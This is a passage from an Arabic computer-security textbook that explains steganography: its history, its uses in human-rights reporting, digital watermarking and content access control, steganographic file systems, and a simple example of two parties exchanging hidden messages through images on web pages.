ﻧﺗﯾﺟﺔ ﻟﮭذه اﻟﺗﻘﻧﯾﺔ ،ھﻲ إﻧﺷﺎء ﺣﯾز Partitionداﺧل اﻟﻘرص اﻟﺻﻠب ،ﯾُﻔ ّﻌل ﺗﻠﻘﺎﺋﯾﺎ ﻋﻧد ﺗﺷﻐﯾل اﻟﺟﮭﺎز وﯾﺳﺗﺧدم ﻟﺗﺧزﯾن اﻟﻣﻌﻠوﻣﺎت اﻟﻣراد
إﺧﻔﺎؤھﺎ .أول ﺗﺳﺟﯾل ﻻﺳﺗﺧدام ھذا اﻟﻣﺻطﻠﺢ ﻛﺎن ﺳﻧﺔ 1499ﻣن ﻗﺑل ﯾوھﺎﻧس ﺗرﯾﺛﯾﻣوس" ، "Johannes Trithemiusﻓﻲ ﻣﻘﺎﻟﺗﮫ
""steganographiaﻋن اﻟﺗﺷﻔﯾر واﻟﻛﺗﺎﺑﺔ اﻟﻣﺧﻔﯾﺔ ﻋﻠﻰ ﺻورة ﻛﺗﺎب ﺗﻌﺎوﯾذ ﺳﺣرﯾﺔ .وﻋﻣوﻣﺎً ،ﻓﺈن اﻟرﺳﺎﺋل ﺳﺗظﮭر ﻋﻠﻰ أﻧﮭﺎ ﺷﻲء ﻣﻐﺎﯾر
ﻛﺻور أو ﻣﻘﺎﻻت أو ﻗواﺋم ﺑﯾﻊ أو أﺷﯾﺎء أﺧرى "ﻧص ﻏطﺎء”. "cover text
https://www.facebook.com/tibea2004 د .ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ
454
اﻟﻣﻔﮭوم اﻟﺗﻘﻠﯾدي ﻟﻠرﺳﺎﻟﺔ اﻟﻣﺧﻔﯾﺔ ھو أن ﺗﻛون ﻣﻛﺗوﺑﺔ ﺑﺣﺑر ﺧﻔﻲ ﺑﯾن اﻟﺳطور اﻟﻣرﺋﯾﺔ ﻟرﺳﺎﻟﺔ ﺧﺎﺻﺔ .إن ﻣﯾزة اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ﻋﻠﻰ اﻟﺗﺷﻔﯾر
اﻟﻣﺟرد ،ھو أن اﻟرﺳﺎﻟﺔ ﺑﺣد ذاﺗﮭﺎ ﻻ ﺗﺟذب اﻻھﺗﻣﺎم .اﻟرﺳﺎﺋل اﻟﻣﺷﻔرة ﺑوﺿوح ،ﺑﻐض اﻟﻧظر ﻋن ﻗﺎﺑﻠﯾﺔ ﻓﻛﮭﺎ ﺗﺑدو ﻣرﯾﺑﺔ؛ ورﺑﻣﺎ ﯾُدان ﻛﺎﺗﺑﮭﺎ
ﻓﻲ اﻟﺑﻠدان اﻟﺗﻲ ﺗﻣﻧﻊ اﻟﺗﺷﻔﯾر ] [1وﻓﻲ اﻟوﻗت اﻟذي ﯾﺣﻣﻲ اﻟﺗﺷﻔﯾر ﻣﺣﺗوى اﻟرﺳﺎﻟﺔ ،ﯾﻣﻛن ﻟﻠﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ أن ﯾﺣﻣﻲ اﻟرﺳﺎﻟﺔ وأطراف اﻟﺗراﺳل
ﻣﻌﺎ ً.
ﯾﺷﻣل اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻓﻲ ﻣﻠﻔﺎت اﻟﺣﺎﺳوب .ﻓﻲ اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟرﻗﻣﻲ ﯾﻣﻛن ان ﯾﺗﺿﻣن اﻻﺗﺻﺎل اﻻﻟﻛﺗروﻧﻲ ﺗرﻣﯾزا ﻣﺧﻔﯾﺎ
ﻓﻲ ﻣﺳﺗوى اﻟوﺳط اﻟﻧﺎﻗل ،ﻣﺛل ﻣﻠف ﻣﺳﺗﻧد ،ﻣﻠف ﺻورة ،ﺑروﺗوﻛول .ﻣﻠﻔﺎت اﻟوﺳﺎﺋط اﻟﻣﺗﻌددة ھﻲ اوﺳﺎط ﻣﺛﺎﻟﯾﺔ ﻟﻺرﺳﺎﻻت اﻟﻣﺧﻔﯾﺔ ،ﺑﺳﺑب
ﻛﺑر ﺣﺟﻣﮭﺎ .ﻛﻣﺛﺎل ﺑﺳﯾط ،ﯾﻣﻛن ﻟﻣرﺳل أن ﯾﺳﺗﺧدم ﺻورة ﻏﯾر ﻣﻠﻔﺗﺔ ،وﯾﻌدل ﻓﻲ ﻟون ﻧﻘطﺔ ) (pixelﻟﻛل ﻣﺋﺔ ﻣن اﻟﻧﻘﺎط ،ﻟﯾﻘﺎﺑل ﺣرف
اﺑﺟدي .ﺳﯾﻛون اﻟﺗﻐﯾﯾر طﻔﯾﻔﺎ وﻏﯾر ﻣﺣﺳوس وﻣن ﻏﯾر اﻟﻣﺣﺗﻣل اﻛﺗﺷﺎﻓﮫ ﺑﺎﻟﻌﯾن اﻟﻣﺟردة.
ﻗد ﯾﺗﺳﺎءل اﻟﺑﻌض .وﻣﺎ اﻟﺣﺎﺟﺔ إﻟﻰ إﺧﻔﺎء وﺟود اﻟﺑﯾﺎﻧﺎت وﻟم اﻟﺧوف؟ واﻟﺳﺑب ﯾﻌود إﻟﻰ وﺟود ﺣﺎﻻت ﻗد ﯾﻛون ﻓﯾﮭﺎ ﻣﺟرد وﺟود ﺷك ﻟدى
اﻟﺳﻠطﺎت أو اﻟﻌﺻﺎﺑﺎت أو ﻏﯾرھم ،ﺑﺗﺳرب ﻣﻌﻠوﻣﺎت ﻣﺎ ،ﻛﻔﯾل ﺑﺎﻟﻘﺿﺎء ﻋﻠﻰ ﺣﯾﺎة إﻧﺳﺎن! ﻛﻣﺎ ﻓﻲ ﺣﺎﻻت اﻧﺗﮭﺎﻛﺎت اﻟﺳﻠطﺎت ﻟﺣﻘوق اﻹﻧﺳﺎن،
وأﺛﻧﺎء اﻟﺣروب اﻷھﻠﯾﺔ ،أو وﻟﻠﻣراﺳﻠﯾن واﻟﺻﺣﻔﯾﯾن اﻟذﯾن ﯾﻐطون اﻟﺣروب واﻟﻐزوات واﻟﻧزاﻋﺎت ،اﻟراﻏﺑﯾن ﻓﻲ إﯾﺻﺎل اﻟﺣﻘﯾﻘﺔ ﻟﻠﻌﺎﻟم ،دون أن
ﯾﻌرﺿوا ﺣﯾﺎﺗﮭم أو ﺣﯾﺎة ﻏﯾرھم ﻟﻠﺧطر.
وﻣﺛﺎل ﺟﯾد ﻋﻠﻰ ھذه اﻟﺣﺎﻻت ،ﻣﺎ ﺣﺻل إﺑﺎن اﻟﺣرب اﻷھﻠﯾﺔ ﻓﻲ ﺟواﺗﯾﻣﺎﻻ ،واﻟﺗﻲ ﻗﺗل ﻓﯾﮭﺎ 100000ﺷﺧص ،ﻓﺑﺣﺳب ﻣﺎ ﯾذﻛره
)(Korhornﻓﺈن اﻟﻣﻧظﻣﺔ اﻟﻌﺎﻟﻣﯾﺔ ﻟﺣﻘوق اﻹﻧﺳﺎن ) (The International Center of Human Rights Researchﻗد ﺟﻣﻌت
ﺣواﻟﻲ 5000ﺷﮭﺎدة ،ﻣن ﺷﮭود ﻋﯾﺎن ،ﻋن طرﯾﻖ اﺳﺗﺧدام ھذه اﻟﺗﻘﻧﯾﺔ ﻣﻊ اﻟﺗﺷﻔﯾر ،ﻓﺣﺻﻠت ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت وﺣﺎﻓظت ﻋﻠﻰ ﺣﯾﺎة اﻟﺷﮭود.
https://www.facebook.com/tibea2004 د .ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ
455
ﻛﺑﯾرا ﻣن اھﺗﻣﺎم اﻟﺑﺎﺣﺛﯾن ،ﻟﺳﺑب ﺑﺳﯾط وھو أن ﻟﮭﺎ اﺳﺗﺧداﻣﺎت ھﺎﻣﺔ ﻓﻲ اﻟﺗﺟﺎرة اﻹﻟﻛﺗروﻧﯾﺔ، ﺣﺎﻟﯾًﺎ ﺗﺷﻐل اﻷﺑﺣﺎث ﻓﻲ ﻣﺟﺎل ھذه اﻟﺗﻘﻧﯾﺔً ،
ﺣﯾزا ً
اﻟﺗﻲ ﺗزداد ﺗطﺑﯾﻘﺎﺗﮭﺎ ،واﻻھﺗﻣﺎم ﺑﮭﺎ ﯾو ًﻣﺎ ﺑﻌد آﺧر .ﺣﯾث ﻣن ﺗطﺑﯾﻘﺎﺗﮭﺎ اﻟﻌﻼﻣﺎت اﻟﻣﺎﺋﯾﺔ أو ﻣﺎ ﯾﻌرف ﺑـ ) .(Watermarksوﺗﺳﺗﺧدم ھذه
اﻷﺧﯾرة ﻓﻲ ﻋﻣﻠﯾﺎت ﺣﻔظ اﻟﺣﻘوق ﻟﻠﻣﻧﺗﺟﺎت اﻟرﻗﻣﯾﺔ ،واﻟﺣد ﻣن ﻋﻣﻠﯾﺎت اﻟﻘرﺻﻧﺔ ،ﻣﺛل اﻷﺳطواﻧﺎت اﻟﺧﺎﺻﺔ ﺑﺎﻟﻣوﺳﯾﻘﻰ وﻏﯾرھﺎ ،وﻛذﻟك
اﻟﺻور واﻟﺑراﻣﺞ اﻟﺗﻲ ﺗﺑﺎع ﻋﺑر اﻹﻧﺗرﻧت .ﻓﺑﺎﻟرﻏم ﻣن أن اﻟﻣﺷﺗري ھﻧﺎ ﻗد ﯾﻌﻠم ﺑوﺟود ھذه اﻟﻌﻼﻣﺎت ،ﻟﻛﻧﮫ ﻻ ﯾﻌرف أﯾن ﺗوﺟد داﺧل اﻟﻣﻧﺗﺞ،
وﻻ اﻟﺑرﻧﺎﻣﺞ اﻟذي اﺳﺗﺧدم ﻓﻲ ﻋﻣﻠﯾﺔ اﻹﺧﻔﺎء ،وﻻ ﻛﻠﻣﺔ اﻟﺳر وﻣﻔﺗﺎح اﻟﺗﺷﻔﯾر ،وﺑﺎﻟﺗﺎﻟﻲ ﯾﺻﻌب ﻋﻠﯾﮫ ،إزاﻟﺗﮭﺎ ،وإﻋﺎدة اﻟﻧﺳﺦ.
Application of Steganography
ﺗطﺑﯾﻖ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ) (Steganographyﯾﺧﺗﻠف ﻓﻲ ﻛﺛﯾر ﻣن ﻣﻧطﻘﮫ اﻟﻰ أﺧرى واﻟﻣﻧطﻘﺔ ﺗﻌﺗﻣد ﻋﻠﻰ ﻣﺎ اﻟﻣﯾزة ﻣن إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت
واﻻﺳﺗﻔﺎدة ﻣﻧﮭﺎ .إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﯾﻧطﺑﻖ ﻋﻠﻰ اﻻﺗﻲ:
Access Control System for Digital Content Distribution
ﻓﻲ 'ﻧظﺎم ﻣراﻗﺑﺔ اﻟوﺻول' ﻟﻧظﺎم 'ﺗوزﯾﻊ اﻟﻣﺣﺗوى اﻟرﻗﻣﻲ' ،اﻟﺑﯾﺎﻧﺎت اﻟﻣﺿﻣﻧﺔ ﺗﻛون 'ﻣﺧﻔﯾﺔ' ،وﻟﻛﻧﮭﺎ 'ﻣﻔﺳره' ﻹﻋﻼن اﻟﻣﺣﺗوى.
اﻟﯾوم ،أﺻﺑﺣت اﻟﻣﺣﺗوﯾﺎت اﻟرﻗﻣﯾﺔ ﺗوزع ﺑﻛﺛره ﻋﺑر ﺷﺑﻛﺔ اﻻﻧﺗرﻧت أﻛﺛر ﻣن ذي ﻗﺑل .ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ،ﺷرﻛﺎت اﻟﻣوﺳﯾﻘﻰ ﺗﻘوم ﺑﺎﻹﻓراج
ﻋن أﻟﺑوﻣﮭﺎ اﻟﺟدﯾد ﻋﻠﻰ ﺻﻔﺣﺔ اﻟوﯾب اﻟﺧﺎﺻﺔ ﺑﮭﺎ ﺑطرﯾﻘﺔ ﻣﺟﺎﻧﯾﺔ أو ﻣﻘﺎﺑل اﻟﻣﺎل .ﻓﻲ ھذه اﻟﺣﺎﻟﺔ ،ﻓﺎن ﻛﺎﻓﺔ اﻟﻣﺣﺗوﯾﺎت ﯾﻣﻛن ﺗوزﯾﻌﮭﺎ
ﺑﺎﻟﺗﺳﺎوي ﻋﻠﻰ اﻟﻧﺎس اﻟذﯾن ﯾﻣﻛﻧﮭم اﻟوﻟوج/اﻟوﺻول إﻟﻰ اﻟﺻﻔﺣﺔ .ﻟذﻟك ،ﻻ ﺗﺗﻧﺎﺳب ﻣﻊ ﻣﺧطط ﺗوزﯾﻊ اﻟوﯾب اﻟﻌﺎدﯾﺔ )ﺣﺎﻟﺔ ﺑﺣﺎﻟﺔ( ،واﻟﺗوزﯾﻊ
'اﻻﻧﺗﻘﺎﺋﻲ' .ﺑﺎﻟطﺑﻊ ﻣن اﻟﻣﻣﻛن داﺋﻣﺎ ً إرﻓﺎق اﻟﻣﺣﺗوﯾﺎت اﻟرﻗﻣﯾﺔ ﺑرﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ وإرﺳﺎﻟﮭﺎ إﻟﻰ اﻟﻌﻣﻼء .وﻟﻛن ھذا ﺳوف ﯾﺄﺧذ اﻟﻛﺛﯾر
ﻣن اﻟﺗﻛﺎﻟﯾف ﻓﻲ اﻟوﻗت واﻟﻌﻣل.
ﻓﻣﺎذا إذا ﻛﺎن ﻣن اﻟﻣﻣﻛن ﺗﺣﻣﯾل ھذا اﻟﻣﺣﺗوى ﻋﻠﻰ اﻹﻧﺗرﻧت ﺑطرﯾﻘﺔ ﺳرﯾﺔ .ﺛم اﻣﻛﻧك اﻟﺣﺻول ﻋﻠﻰ إﺻدار ﺧﺎص ﺑك ﻣن 'ﻣﻔﺗﺎح اﻟوﺻول'
واﻟذي ﺑواﺳطﺗﮫ ﺳوف ﺗﻘوم ﺑﺎﺳﺗﺧراج اﻟﻣﺣﺗوى ﺑﺷﻛل اﻧﺗﻘﺎﺋﻲ ،ﻓﺈﻧك ﺳوف ﺗﻛون ﺳﻌﯾدة ﺟدا ً ﺑذﻟك .ﻟذﻟك ﻣﺧطط Steganographyﯾﻣﻛن أن
ﯾﺳﺎﻋد ﻓﻲ ﺗﺣﻘﯾﻖ ھذا اﻟﻧوع ﻣن اﻟﻧظﺎم.
ھﻧﺎ ﻗﻣﻧﺎ ﺑﺗطوﯾر اﻟﻧﻣوذج اﻷوﻟﻰ )(prototypeﻣن "ﻧظﺎم ﻣراﻗﺑﺔ اﻟدﺧول) " (Access Control Systemﻟﺗوزﯾﻊ اﻟﻣﺣﺗوى اﻟرﻗﻣﻲ ﻣن
ﺧﻼل ﺷﺑﻛﺔ اﻹﻧﺗرﻧت .ﺗﺷرح اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ ھذا اﻟﻣﺧطط.
-1ﻣﺎﻟك اﻟﻣﺣﺗوى اﻟرﻗﻣﻲ ﯾﻘوم ﺑﺗﺻﻧﯾف اﻟﻣﺣﺗوﯾﺎت اﻟرﻗﻣﯾﺔ ﻓﻲ ﺻورة ﻣﺟﻠد ﻣن اﻟﻣﺟﻠدات ،وﺗﺿﻣﯾن ھذه اﻟﻣﺟﻠدات ﻛﺎﻣﻠﺔ ﻓﻲ وﻋﺎء
ﻛﺑﯾر وﻓﻘﺎ ﻷﺳﻠوب Steganographyاﻟﻣﺳﺗﺧدم ﯾﺣﺗﺎج اﻟﻰ ﻣﻔﺎﺗﯾﺢ ﻟﻠوﺻول إﻟﻰ ھذه اﻟﻣﺟﻠدات ،ﺛم ﺗﺣﻣﯾل ھذا اﻟوﻋﺎء اﻟﻣﺿﻣن
ﻟﻠﻣﺣﺗوى ﻋﻠﻰ ﺻﻔﺣﺔ اﻟوﯾب اﻟﺧﺎﺻﺔ.
-2ﻋﻠﻰ ﺻﻔﺣﺔ اﻟوﯾب اﻟﺧﺎﺻﺔ ﺑﮫ ﺻﺎﺣب اﻟﻣﺣﺗوى ﯾﻘوم ﺑﺷرح اﻟﻣﺣﺗوى ﺑطرﯾﻘﮫ ﻣﺗﻌﻣﻘﺔ وﻧﺷرھﺎ ﻓﻲ ﺟﻣﯾﻊ أﻧﺣﺎء اﻟﻌﺎﻟم .وﯾﺗم ﻧﺷر
ﻣﻌﻠوﻣﺎت اﻻﺗﺻﺎل ﻟﺻﺎﺣب اﻟﻣﺣﺗوى أﯾﺿﺎ )اﻟﻌﻧوان ،ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ورﻗم اﻟﮭﺎﺗف ،اﻟﺦ( ھﻧﺎك.
-3ﻓﻲ ھذه اﻟﺣﺎﻟﺔ ﯾﺗﻠﻘﻰ اﻟﻣﺎﻟك طﻠﺑﺎت اﻟوﺻول ﻟﻠﻣﺣﺗوى ﻣن ﻗﺑل اﻟﻌﻣﻼء اﻟذﯾن ﺷﺎھدوا ﺻﻔﺣﺔ اﻟوﯾب .ﻓﻲ ھذه اﻟﺣﺎﻟﺔ ،ﯾﺟوز ﻟﻠﻣﺎﻟك )أو
ﻗد ﻻ( ﺑﺈﻧﺷﺎء ﻣﻔﺗﺎح وﺻول وﺗﻘدﯾﻣﮭﺎ إﻟﻰ اﻟﻌﻣﻼء )ﻣﺟﺎﻧﺎ أو ﻣﻘﺎﺑل اﻟﻣﺎل(.
ﻓﻲ ھذه اﻻﻟﯾﮫ ﻓﺎن اھم ﻧﻘطﮫ ھو اﻻﺳﺗﺧراج اﻻﻧﺗﻘﺎﺋﻲ ھل ھو ﻣﻣﻛن أم ﻻ.
Steganography File Systems
Steganography File Systemsھﻲ ﻧوع ﻣن أﻧظﻣﺔ اﻟﻣﻠﻔﺎت ,أول ﻣن اﻗﺗرﺣﮫ روس أﻧدرﺳون ،روﺟر ﻧﯾدام ،وادي ﺷﺎﻣﯾر .وھذه ﺗﻘدم
طرﯾﻘﺗﯾن رﺋﯾﺳﯾﺗﯾن ﻹﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت :ﺑﺎﺳﺗﺧدام ﺳﻠﺳﻠﺔ ﻣن اﻟﻣﻠﻔﺎت ذات اﻟﺣﺟم اﻟﺛﺎﺑت واﻟﺗﻲ ﺗﺗﺄﻟف أﺻﻼً ﻣن اﻟﺑﺗﺎت اﻟﻌﺷواﺋﯾﺔ ﻋﻠﻰ رأﺳﮭﺎ
'ﻧﺎﻗﻼت) '(vectorواﻟﺗﻲ ﯾﺗم ﻓرﺿﮭﺎ ﺑطرﯾﻘﺔ ﺗﺳﻣﺢ ﻟﻣﺳﺗوﯾﺎت اﻷﻣن ﺑﻔك ﺗﺷﻔﯾر ﺟﻣﯾﻊ اﻟﻣﺳﺗوﯾﺎت اﻻدﻧﻰ وﻟﻛن ﻻ ﺗﻌﻠم ﺑوﺟود ﻣﺳﺗوﯾﺎت اﻻﻣن
اﻷﻋﻠﻰ ،أو ﻗﺳم ﻛﺎﻣل ﻣﻠﻲء ﺑﺎﻟﺑﺗﺎت اﻟﻌﺷواﺋﯾﺔ واﻟﻣﻠﻔﺎت اﻟﻣﺧﻔﯾﺔ ﻓﻲ ذﻟك.
اﻟطرﯾﻘﺔ اﻟﺛﺎﻧﯾﺔ واﻟﺗﻲ ﯾﻘدﻣﮭﺎ Steganography File Systemsوھﻲ أن اﻟﻣﻠﻔﺎت ﻻ ﯾﺗم ﺗﺧزﯾﻧﮭﺎ ﺑطرﯾﻘﺔ ﻋﺎدﯾﮫ ،وﻻ ﺗﺧزﯾﻧﮭﺎ ﺑطرﯾﻘﺔ
ﻣﺷﻔرة ،ﻟﻛن اﻟﺑﺎرﺗﺷن ﺑﺎﻟﻛﺎﻣل ﯾﺗم ﺟﻌﻠﮫ ﻋﺷواﺋﯾﺎ --اﻟﻣﻠﻔﺎت اﻟﻣﺷﻔرة ﺗﺷﺑﮫ ﺑﻘوة اﻟﻣﻘﺎطﻊ اﻟﻌﺷواﺋﯾﺔ ﻟﻠﺑﺎرﺗﺷن ،وﺣﺗﻰ ﻋﻧدﻣﺎ ﯾﺗم ﺗﺧزﯾن اﻟﻣﻠﻔﺎت
ﻋﻠﻰ اﻟﺑﺎرﺗﺷن ،ﻻ ﺗوﺟد طرﯾﻘﺔ ﺳﮭﻠﺔ ﻟﻠﺗﻣﯾﯾز ﺑﯾن رطﺎﻧﺔ ﻻ ﻣﻌﻧﻰ ﻟﮭﺎ واﻟﻣﻠﻔﺎت اﻟﻣﺷﻔرة اﻟﻔﻌﻠﯾﺔ .وﻋﻼوة ﻋﻠﻰ ذﻟك ،ﻓﺄن ﻣواﻗﻊ اﻟﻣﻠﻔﺎت ﺗﻛون
ﻣﻌرﻓﺔ ﻣن ﻗﺑل ﻣﻔﺎﺗﯾﺢ اﻟﻣﻠﻔﺎت ،وﻣواﻗﻊ اﻟﻣﻠﻔﺎت ﺗﻛون ﻣﺧﻔﯾﺔ وﻣﺗﺎﺣﺔ ﻓﻘط ﻟﻠﺑراﻣﺞ ﻣﻊ ﻛﻠﻣﺔ اﻟﻣرور .وھذا ﯾؤدي إﻟﻰ اﻟﻣﺷﻛﻠﺔ وھﻲ اﻧﮫ ﯾﻣﻛن
اﻟﻛﺗﺎﺑﺔ ﻓوق اﻟﻣﻠﻔﺎت ﺑﻌﺿﮭﺎ اﻟﺑﻌض ﺑﺳرﻋﺔ ﺟداً؛ وھذا ﯾﺗم ﺣﻠﮫ ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ ﻛﺎﻓﺔ اﻟﻣﻠﻔﺎت ﻓﻲ أﻣﺎﻛن ﻣﺗﻌددة ﻟﺗﻘﻠﯾل ﻓرﺻﺔ ﻓﻘد اﻟﺑﯾﺎﻧﺎت.
Media Bridging
اﺳﺗﺧدام إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟرﻗﻣﯾﺔ ،ﺣﯾث ﯾﻣﻛن ﺗﺷﻔﯾر اﻻﺗﺻﺎﻻت اﻹﻟﻛﺗروﻧﯾﺔ ﻓﻲ طﺑﻘﺔ اﻟﻧﻘل) ، (transport layerﻣﺛل ﻣﻠف اﻟﻣﺳﺗﻧد أو
ﻣﻠف ﺻورة أو ﺑرﻧﺎﻣﺞ أو ﺑروﺗوﻛول.
ﻓﻲ ھذه اﻟﻣﻧطﻘﺔ ﺗطﺑﯾﻖ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ ﻟﯾس ﻣﮭﻣﺎ ،وﻟﻛن ﺗوﺣﯾد ھذﯾن اﻟﻧوﻋﯾن ﻣن اﻟﺑﯾﺎﻧﺎت )اﻟوﺳﺎﺋط – اﻟﺑﯾﺎﻧﺎت( إﻟﻰ واﺣد ھو اﻷﻛﺛر
أھﻣﯾﺔ .اﻟوﺳﺎﺋط ﻣﺛل )اﻟﺻور ،اﻻﻓﻼم ،اﻟﻣوﺳﯾﻘﻰ ،إﻟﺦ( ﯾﺗم رﺑطﮭﺎ ﺑﺑﻌض اﻟﻣﻌﻠوﻣﺎت اﻷﺧرى .اﻟﺻورة ،ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ،ﻗد ﺗﺣﺗوي ﻋﻠﻰ
ﻣﺎ ﯾﻠﻲ ﻣن اﻟﻣﻌﻠوﻣﺎت:
-1ﻋﻧوان ﻟﻠﺻورة وﺑﻌض اﻟﻣﻌﻠوﻣﺎت ﻋن .physical object
-2اﻟﺗﺎرﯾﺦ واﻟوﻗت ﻋﻧد اﺗﺧﺎذ ھذه اﻟﺻورة.
-3ﻣﻌﻠوﻣﺎت ﻋن اﻟﻛﺎﻣﯾرا اﻟﻣﺳﺗﺧدﻣﺔ واﻟﻣﺻور.
ھذه اﻟﻣﻌﻠوﻣﺎت داﺋﻣﺎ ﻣﺎ ﺗﻛون ﺑﺟﺎﻧب ﻛل ﺻوره.
ﻓﻲ اﻟﻣﻣﺎرﺳﺎت اﻟﻌﻣﻠﯾﺔ ،ﻋﻧد اﺳﺗﺧدام إﺧﻔﺎء ﺑﻌض اﻟﻣﻌﻠوﻣﺎت ،ﯾﺟب أوﻻً ﺗﺣدﯾد ﺑﯾﺎﻧﺎت اﻟﻣﺳﺗودع اﻟذي ﺳوف ﯾﺣﻣل اﻟﺑﯾﺎﻧﺎت اﻟﻣﺧﺑﺎءه وﻓﻘﺎ
ﻟﺣﺟم ﺑﯾﺎﻧﺎت اﻟﺗﺿﻣﯾن .وﯾﻧﺑﻐﻲ أن ﯾﻛون اﻟﻣﺳﺗودع ﻏﯾر ﺿﺎرة .ﺛم ،ﯾﻣﻛﻧك ﺗﺿﻣﯾن ﺑﯾﺎﻧﺎت ﺳرﯾﺔ ﺑﺎﺳﺗﺧدام ﺑرﻧﺎﻣﺞ ﺗﺿﻣﯾن )واﻟذي أﺣد
ﻣﻛوﻧﺎت اﻟﺑرﻧﺎﻣﺞ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت( ﺟﻧﺑﺎ إﻟﻰ ﺟﻧب ﻣﻊ ﺑﻌض اﻟﻣﻔﺗﺎح .ﻋﻧد اﺳﺗﺧراج ،اﻟﺑﯾﺎﻧﺎت )اﻟطرف اﻟﺧﺎص ﺑك( ﺑﺎﺳﺗﺧدام ﺑرﻧﺎﻣﺞ
اﺳﺗﺧراج )ﻣﻛون آﺧر( ﻻﺳﺗرداد ﺑﯾﺎﻧﺎت ﻣﺿﻣﻧﮫ ﺑﻧﻔس اﻟﻣﻔﺗﺎح )اﻟﻣﻔﺗﺎح اﻟﻌﺎم ﻣن ﺣﯾث ﻣﻔﮭوم اﻟﺗﺷﻔﯾر( .وﻓﻲ ھذه اﻟﺣﺎﻟﺔ ﺗﺣﺗﺎج اﻟﻰ 'ﻣﻔﺗﺎح
اﻟﺗﻔﺎوض ﻗﺑل أن ﺗﺑدأ اﻻﺗﺻﺎﻻت.
إرﻓﺎق ﻣﻠف ﺳﺗﯾﺟو ﺑرﺳﺎﻟﺔ اﻟﺑرﯾد إﻟﻛﺗروﻧﻲ ھو أﺑﺳط ﻣﺛﺎل ﻓﻲ ھذا اﻟﻣﺟﺎل .وﻟﻛن أﻧت واﻟطرف اﻟﺧﺎص ﺑك ﯾﺟب اﻟﻘﯾﺎم ﺑﺈﺟراء 'إرﺳﺎل--و--
ﺗﻠﻘﻲ' اﻟﺗﻲ ﯾﻣﻛن أن ﯾﺗم ﻣﻼﺣظﺗﮭﺎ ﻣن ﻗﺑل طرف ﺛﺎﻟث .ﻟذا ،اﺳﺗﺧدام اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻟﯾس أﺳﻠوب اﺗﺻﺎل ﺳري ﺗﻣﺎﻣﺎ.
ھﻧﺎك ﺑﻌض أﺳﻠوب اﻻﺗﺻﺎل اﻷﺧرى ﻣﺛل اﻟذي ﯾﺳﺗﺧدم 'ﺻﻔﺣﺔ اﻟوﯾب' اﻹﻧﺗرﻧت .ﻓﻲ ھذه اﻟطرﯾﻘﺔ ﻻ ﺗﺣﺗﺎج إﻟﻰ إرﺳﺎل أي ﺷﻲء إﻟﻰ اﻟطرف
اﻟﺧﺎص ﺑك ،وﻻ أﺣد ﯾﺳﺗطﯾﻊ ﻛﺷف اﻻﺗﺻﺎل اﻟﺧﺎﺻﺔ ﺑك .ﻓﻠﻧظر اﻟﻰ اﻟﻣﺛﺎل اﻟﺗﺎﻟﻲ:
ﻟﻧﻔرض ﻣﺛﻼ وﺟود ﺷﺧﺻﯾن ﯾرﯾدان اﻟﺑدء ﻓﻲ اﺗﺻﺎل ﺳري ﺑﯾﻧﮭم ﻣﺛﻼ ﻓﻠﯾﻛن ھذﯾن اﻟﺷﺧﺻﯾن ) Mr. Aو ( Mr. Bﻛﻣﺎ ﻓﻲ اﻟﺷﻛل اﻟﺗﺎﻟﻲ.
ﻧﺟد أن ﻟدﯾﮭم ﻛل ﺻﻔﺣﺎت اﻟوﯾب اﻟﺧﺎﺻﺔ ﺑﮭم ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت .ﻧﺟد ان اﻟﺷﺧص Mr. Aﯾﻣﻠك ﺑﯾﺎﻧﺎت ﺻورة )ﺻورة اﻣرأة( ،واﻟﺷﺧص
Mr. Bھو اﻷﺧر ﯾﻣﻠك ﺑﯾﺎﻧﺎت ﺻورة )ﺻورة اﻟﺣوت اﻟﻘﺎﺗل( .واﻻﺛﻧﯾن واﻓﻘﺎ ﺑﺎﻟﻔﻌل ﻋﻠﻰ اﺳﺗﺧدام ﻣﻔﺗﺎح ﻣﺷﺗرك ﻣﻌﯾن ﻟﺗﺿﻣﯾن/اﺳﺗﺧراج
اﻟرﺳﺎﺋل.
ھذا اﻻﺗﺻﺎل ﯾﺗم ﻛﺎﻻﺗﻰ:
-1ﯾﻘوم اﻟﺷﺧص Mr. Aأوﻻ ﺑﺈﻧﺷﺎء رﺳﺎﻟﺔ ﻧﺻﯾﮫ وﻟﯾﻛن ﻣﺛﻼ messageﺛم ﯾﻘوم ﺑﺗﺿﻣﯾﻧﮭﺎ ﻓﻲ ﺻورة اﻣرأة ﻟﯾﻧﺗﺞ ﻣﻠف ﺳﺗﯾﺟو ﻣن
ﺻورة اﻣراه.
-2ﺛم ﯾﻘوم اﻟﺷﺧص Mr. Aﺑﺗﺣﻣﯾﻠﮭﺎ ﻋﻠﻰ ﺻﻔﺣﺔ اﻟوﯾب ﺧﺎﺻﺗﮫ.
-3ﻗرﯾﺑﺎ ﺳوف ﯾﻼﺣظ اﻟﺷﺧص Mr. Bﺑذﻟك ،ﺛم ﯾﻘوم ﺑﺗﺣﻣﯾﻠﮭﺎ.
